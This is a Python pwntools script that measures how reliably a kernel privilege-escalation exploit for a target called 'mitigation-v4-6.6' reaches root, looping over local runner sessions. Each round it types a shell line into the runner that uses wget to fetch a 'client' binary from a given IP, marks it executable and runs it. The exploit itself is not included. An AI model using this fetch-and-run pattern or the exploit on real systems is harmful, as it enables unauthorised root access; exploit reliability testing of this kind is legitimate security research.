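"""Run the server/client pair COUNT times and report how often it succeeds.

Usage: <script> IP PORT COUNT

Each round starts a fresh server process and a fresh local runner, has the
runner fetch and execute the client, and counts the round as a success when
the runner's captured output contains ``b'root'``.
"""
from pwn import *
import sys

context.log_level = 'CRITICAL'
my_dict = {}  # not referenced anywhere in the visible script
import random

ip = sys.argv[1]
port = int(sys.argv[2])
count = int(sys.argv[3])

success = 0
for i in range(count):
    print(f'#{i+1}')
    p = process(["./exploit/mitigation-v4-6.6/server", "--port", str(port)])
    q = None
    # Reset per round: if the receive fails, the check below must not see
    # the previous round's output (or an unbound name on the first round).
    data = b''
    try:
        q = process(["./local_runner.sh", "mitigation-v4-6.6"])
        # ip and port are interpolated unquoted into a shell command line,
        # so they must be a plain host and port taken from the operator's argv.
        q.sendlineafter(b"user@", f"cd /tmp && wget http://{ip}:3000/client && chmod +x ./client && ./client --ip {ip} --port {port}".encode())
        try:
            data = q.recvall(timeout=10)
        except Exception:
            # A failed receive is scored as a failed round; Ctrl-C still
            # propagates because only Exception is caught.
            data = b''
        else:
            # Console output is not guaranteed to be valid UTF-8.
            print(data.decode(errors='replace'))
    finally:
        # Always tear both processes down so a failed round does not leave
        # a server bound to the port or a runner still alive.
        p.close()
        if q is not None:
            q.close()
    # NOTE(review): plain substring match; any other "root" in the captured
    # output (for example in boot messages) would also be counted. Confirm
    # against what local_runner.sh actually prints.
    if b'root' in data:
        success += 1
    port += 2
    # Running tally, printed after every round.
    print(f'Success rate: {success}/{i+1}')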